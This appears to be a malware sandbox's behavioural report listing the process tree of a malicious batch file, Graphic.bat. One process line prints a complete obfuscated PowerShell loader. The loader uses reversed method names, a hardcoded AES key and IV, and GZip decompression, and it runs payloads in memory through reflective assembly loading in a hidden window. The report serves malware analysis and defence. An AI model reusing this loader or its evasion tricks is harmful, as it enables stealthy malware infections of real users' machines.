| ZeroBOX

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "uHLJpVGfRUspaRT" C:\Users\test22\AppData\Local\Temp\Graphic.bat

    3040
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Graphic.bat

      2212
      • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VMgq2gzL6weWWE0iy7mEbeT9QEdXb/DC0LGbP1Bx2RE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f7cKJCv1f/RnSRDeUTGLPg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IYJib=New-Object System.IO.MemoryStream(,$param_var); $FAtwk=New-Object System.IO.MemoryStream; $sNVUm=New-Object System.IO.Compression.GZipStream($IYJib, [IO.Compression.CompressionMode]::Decompress); $sNVUm.CopyTo($FAtwk); $sNVUm.Dispose(); $IYJib.Dispose(); $FAtwk.Dispose(); $FAtwk.ToArray();}function execute_function($param_var,$param2_var){ $QeYHA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tQMXq=$QeYHA.EntryPoint; $tQMXq.Invoke($null, $param2_var);}$Bfpkh = 'C:\Users\test22\AppData\Local\Temp\Graphic.bat';$host.UI.RawUI.WindowTitle = $Bfpkh;$rbsBu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Bfpkh).Split([Environment]::NewLine);foreach ($VRwdV in $rbsBu) { if ($VRwdV.StartsWith('ZliBjlbtNhCQvDpXbUuz')) { $WkwqH=$VRwdV.Substring(20); break; }}$payloads_var=[string[]]$WkwqH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

        2220
      • powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

        2420

Process contents

No process loaded Click on a process in the tree above to load its data.